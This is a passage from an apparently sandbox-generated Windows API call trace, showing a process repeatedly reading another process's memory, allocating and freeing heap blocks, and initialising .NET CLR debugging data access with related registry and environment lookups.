lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ae0, lpBuffer=0x22b34a41dac, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41dac*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.139] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1804, lpBuffer=0x22b34a41db8, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41db8*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.140] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a4, lpBuffer=0x22b34a41dc4, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41dc4*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11b0, lpBuffer=0x22b34a41dd0, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41dd0*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70478, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1120, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1124, lpBuffer=0x22b34a41ddc, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41ddc*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb002c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0028, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0024, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.141] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70070, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.142] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.142] OutOfProcessFunctionTableCallback () returned 0x0 [0081.142] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76978, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76978*, lpNumberOfBytesRead=0x0) returned 1 [0081.142] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76890, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76890*, lpNumberOfBytesRead=0x0) returned 1 [0081.142] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63a0, lpBuffer=0x4c1ec76880, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76880*, lpNumberOfBytesRead=0x0) returned 1 [0081.142] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9587b0, lpBuffer=0x4c1ec76868, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76868*, lpNumberOfBytesRead=0x0) returned 1 [0081.142] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70020, lpBuffer=0x4c1ec768a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec768a0*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.143] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70478, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1120, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.144] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb002c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0028, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0024, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70070, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] GetProcessHeap () returned 0x22b349a0000 [0081.145] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41440 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.145] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad4, lpBuffer=0x22b34a41440, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41440*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ae0, lpBuffer=0x22b34a4144c, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a4144c*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1804, lpBuffer=0x22b34a41458, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41458*, lpNumberOfBytesRead=0x0) returned 1 [0081.146] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a4, lpBuffer=0x22b34a41464, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41464*, lpNumberOfBytesRead=0x0) returned 1 [0081.147] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11b0, lpBuffer=0x22b34a41470, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41470*, lpNumberOfBytesRead=0x0) returned 1 [0081.148] OutOfProcessFunctionTableCallback () returned 0x0 [0081.150] GetProcessHeap () returned 0x22b349a0000 [0081.150] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41da0 [0081.154] OutOfProcessFunctionTableCallback () returned 0x0 [0081.155] GetProcessHeap () returned 0x22b349a0000 [0081.155] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41a80 [0081.158] OutOfProcessFunctionTableCallback () returned 0x0 [0081.162] GetProcessHeap () returned 0x22b349a0000 [0081.162] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41da0 [0081.164] OutOfProcessFunctionTableCallback () returned 0x0 [0081.166] GetProcessHeap () returned 0x22b349a0000 [0081.166] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41440 [0081.169] OutOfProcessFunctionTableCallback () returned 0x0 [0081.171] GetProcessHeap () returned 0x22b349a0000 [0081.171] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a418f0 [0081.173] OutOfProcessFunctionTableCallback () returned 0x0 [0081.186] GetProcessHeap () returned 0x22b349a0000 [0081.186] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41940 [0081.239] OutOfProcessFunctionTableCallback () returned 0x0 [0081.240] GetProcessHeap () returned 0x22b349a0000 [0081.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41440 [0081.245] OutOfProcessFunctionTableCallback () returned 0x0 [0081.246] GetProcessHeap () returned 0x22b349a0000 [0081.246] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41da0 [0084.095] OutOfProcessFunctionTableCallback () returned 0x0 [0084.096] GetProcessHeap () returned 0x22b349a0000 [0084.096] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x12c) returned 0x22b34a41e60 [0084.101] OutOfProcessFunctionTableCallback () returned 0x0 [0084.103] GetProcessHeap () returned 0x22b349a0000 [0084.103] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41c10 [0084.189] CLRDataCreateInstance () returned 0x0 [0084.189] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b34a2f620 [0084.190] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b34a41e60 [0084.190] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d6b0 [0084.190] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b34a370c0 [0084.190] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0084.190] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0084.190] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77990 | out: phkResult=0x4c1ec77990*=0x0) returned 0x2 [0084.190] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77998 | out: phkResult=0x4c1ec77998*=0x288) returned 0x0 [0084.190] RegQueryValueExW (in: hKey=0x288, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec779f8, lpData=0x4c1ec77988, lpcbData=0x4c1ec77980*=0x4 | out: lpType=0x4c1ec779f8*=0x0, lpData=0x4c1ec77988*=0x0, lpcbData=0x4c1ec77980*=0x4) returned 0x2 [0084.190] RegCloseKey (hKey=0x288) returned 0x0 [0084.190] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b37470000 [0084.222] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d9b0 [0084.222] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d260 [0084.222] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d830 [0084.222] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d200 [0084.222] GetLastError () returned 0xcb [0084.222] SetLastError (dwErrCode=0xcb) [0084.222] GetLastError () returned 0xcb [0084.223] SetLastError (dwErrCode=0xcb) [0084.223] GetLastError () returned 0xcb [0084.223] SetLastError (dwErrCode=0xcb) [0084.224] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d9b0 | out: hHeap=0x22b349a0000) returned 1 [0084.224] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d260 | out: hHeap=0x22b349a0000) returned 1 [0084.224] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d830 | out: hHeap=0x22b349a0000) returned 1 [0084.224] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d200 | out: hHeap=0x22b349a0000) returned 1 [0084.224] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d9e0 [0084.224] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d800 [0084.225] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3db00 [0084.225] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d200 [0084.225] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d3b0 [0084.226] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x28) returned 0x22b34a3d4a0 [0084.226] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d6e0 [0084.227] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d590 [0084.227] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a3d4a0 | out: hHeap=0x22b349a0000) returned 1 [0084.228] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d950 [0084.228] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d4a0 [0084.228] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b34a3ad10 [0084.228] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a370c0 | out: hHeap=0x22b349a0000) returned 1 [0084.228] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3cf30 [0084.228] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d740 [0084.229] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d560 [0084.229] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3cf60 [0084.229] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d260 [0084.230] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a3d5c0 